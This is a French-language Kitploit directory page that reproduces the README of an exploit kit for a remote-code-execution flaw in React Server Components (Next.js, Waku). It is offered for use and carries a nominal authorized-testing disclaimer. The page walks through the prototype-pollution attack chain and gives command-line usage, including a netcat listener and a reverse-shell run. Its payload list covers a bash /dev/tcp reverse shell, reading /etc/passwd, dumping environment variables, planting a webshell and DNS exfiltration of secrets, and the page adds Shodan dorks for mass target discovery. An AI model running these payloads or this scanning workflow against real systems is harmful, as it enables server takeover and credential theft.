Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
PoC-RCE-CVE-2025-55182 — Boîte à outils d'exploitation RCE avancée pour les vulnérabilités des composants serveur React. Dispose de plusieurs charges utiles pré-construites, d'une intégration Shodan pour la découverte de cibles et d'un balayage de masse pour les tests d'intrusion autorisés. | Kitploit
Outils/GitHubGitHub/ilixm/poc-rce-cve-2025-55182
ReconnaissanceAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionCommandement et ContrôleRed TeamingOutil d'Accès à Distance

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Développement de Charges Utiles
GitHubilixm/poc-rce-cve-2025-55182

PoC-RCE-CVE-2025-55182

Boîte à outils d'exploitation RCE avancée pour les vulnérabilités des composants serveur React. Dispose de plusieurs charges utiles pré-construites, d'une intégration Shodan pour la découverte de cibles et d'un balayage de masse pour les tests d'intrusion autorisés.

Voir le dépôt
14il y a 9 moisPas encore vérifié
Partager

🔥 Kit d'exploitation RSC RCE

Version License Node Platform

Kit d'exploitation avancé pour les vulnérabilités d'exécution de code à distance (RCE) des React Server Components

Pour les tests d'intrusion autorisés et la recherche en sécurité uniquement

Fonctionnalités • Installation • Utilisation • Intégration Shodan • Exemples • Avertissement


📋 Table des matières

  • Aperçu
  • Détails de la vulnérabilité
  • Fonctionnalités
  • Installation
  • Démarrage rapide
  • Utilisation
    • Exploitation de base
    • Payloads disponibles
    • Payloads personnalisés
  • Intégration Shodan
  • Analyse automatisée
  • Exemples
  • Atténuation
  • Versions concernées
  • Contribution
  • Avertissement
  • Licence

🎯 Aperçu

Ce kit exploite une vulnérabilité critique d'exécution de code à distance (RCE) dans les implémentations des React Server Components (RSC), ciblant spécifiquement :

  • Next.js (versions 13.4.0 - 14.1.0)
  • Waku (versions vulnérables)

La vulnérabilité tire parti de la pollution de prototype et d'une désérialisation non sécurisée dans le mécanisme de gestion des données de RSC pour parvenir à une exécution de code arbitraire sur le serveur.

🔴 Sévérité : CRITIQUE

  • Score CVSS : 9,8 (Critique)
  • Vecteur d'attaque : Réseau
  • Privilèges requis : Aucun
  • Interaction utilisateur : Aucune
  • Impact : Compromission totale du serveur

🔬 Détails de la vulnérabilité

Contexte technique

Les React Server Components utilisent un format de sérialisation personnalisé pour transférer les données entre le client et le serveur. La vulnérabilité réside dans la façon dont ces frameworks désérialisent et traitent des payloads spécialement conçus.

Chaîne d'attaque :

  1. Construction du payload : Concevoir un payload RSC malveillant avec des références circulaires
  2. Pollution de prototype : Abuser de $X:constructor:constructor pour accéder au constructeur Function
  3. Injection de code : Injecter du JavaScript arbitraire dans le champ _prefix
  4. Exécution : Le serveur désérialise et exécute le payload

Déroulement de l'exploitation

Attacker → Malicious RSC Payload → Target Server
                                         ↓
                              Unsafe Deserialization
                                         ↓
                              Prototype Chain Access
                                         ↓
                              Function Constructor
                                         ↓
                              ⚠️ RCE ACHIEVED ⚠️

✨ Fonctionnalités

Fonctionnalités principales

  • ✅ Prise en charge de plusieurs frameworks : Next.js et Waku
  • ✅ 8 payloads pré-construits : Du PoC aux reverse shells complets
  • ✅ Exécution de code personnalisé : Injecter n'importe quel code JavaScript
  • ✅ Intégration Shodan : Découverte automatisée de cibles
  • ✅ Analyse de masse : Tester plusieurs cibles automatiquement
  • ✅ CLI professionnelle : Interface en ligne de commande complète
  • ✅ Journalisation détaillée : Sortie colorée avec horodatage
  • ✅ Gestion des erreurs : Gestion robuste des erreurs

Payloads pré-construits

PayloadDescriptionCas d'utilisation
consolePoC de base (console.log)Vérifier la vulnérabilité
reverseShellReverse shell BashAccès initial
readFileLire /etc/passwdAccès au système de fichiers
envDumpVider les variables d'environnementExtraction d'identifiants
execCommandExécuter des commandes systèmeExécution de commandes arbitraires
webshellDéployer un webshell ExpressAccès persistant
exfilPackageExfiltrer package.jsonAnalyse des dépendances
dnsExfilExfiltration DNS (OOB)Exploitation aveugle

📦 Installation

Prérequis

  • Node.js >= 16.0.0
  • npm ou yarn
  • Shodan CLI (optionnel, pour l'analyse automatisée)

Cloner le dépôt

git clone https://github.com/yourusername/rsc-rce-exploit.git
cd rsc-rce-exploit

Installer les dépendances

npm install
# or
yarn install

Configurer Shodan (optionnel)

# Install Shodan CLI
pip install shodan

# Initialize with your API key
shodan init YOUR_API_KEY

🚀 Démarrage rapide

1. Vérification de vulnérabilité de base

node rsc-rce-exploit.js --target http://vulnerable-target.com --payload console

2. Obtenir un reverse shell

# Start listener
nc -lvnp 4444

# Execute exploit
node rsc-rce-exploit.js \
  --target http://vulnerable-target.com \
  --payload reverseShell \
  --lhost 10.10.14.5 \
  --lport 4444

3. Exécuter une commande personnalisée

node rsc-rce-exploit.js \
  --target http://vulnerable-target.com \
  --payload execCommand \
  --command "whoami"

📖 Utilisation

Exploitation de base

node rsc-rce-exploit.js [options]

Options

OptionDescriptionRequis
--target <url>URL cible✅
--framework <name>Framework : next ou waku❌ (défaut : next)
--payload <name>Nom du payload (voir ci-dessous)✅*
--custom <code>Code JavaScript personnalisé✅*
--lhost <ip>Votre IP (pour le reverse shell)❌
--lport <port>Votre port (pour le reverse shell)❌
--command <cmd>Commande à exécuter❌
--endpoint <path>Endpoint RSC personnalisé (Waku)❌
--action-id <id>ID next-action personnalisé❌
--listLister les payloads disponibles❌
--verboseSortie détaillée (verbose)❌
--helpAfficher l'aide❌

*--payload ou --custom est requis

Payloads disponibles

Voir tous les payloads :

node rsc-rce-exploit.js --list

Sortie :

📋 Available payloads:

  console              - Basic PoC - Console output
    Code: console.log(7*7+1)

  reverseShell         - Reverse shell (bash)
    Code: require('child_process').exec('bash -c "bash -i >& /dev/tcp/LHOST/LPORT 0>&1"')

  readFile             - Read /etc/passwd
    Code: console.log(require('fs').readFileSync('/etc/passwd','utf8'))

  envDump              - Dump environment variables
    Code: console.log(JSON.stringify(process.env,null,2))

  execCommand          - Execute system command
    Code: console.log(require('child_process').execSync('COMMAND').toString())

  webshell             - Write webshell to /tmp
    Code: require('fs').writeFileSync('/tmp/shell.js','...')

  exfilPackage         - Read package.json
    Code: console.log(require('fs').readFileSync('./package.json','utf8'))

  dnsExfil             - DNS exfiltration
    Code: require('dns').resolve4(Buffer.from(process.env.SECRET||'nosecret')...)

Payloads personnalisés

Exécuter n'importe quel code JavaScript :

node rsc-rce-exploit.js \
  --target http://target.com \
  --custom "require('fs').readdirSync('.').forEach(f=>console.log(f))"

🌐 Intégration Shodan

Dorks Shodan

Cibles Next.js

# Basic Next.js
http.component:"Next.js"

# Next.js with RSC
http.html:"__next" http.html:"RSC"
Télécharger l’outil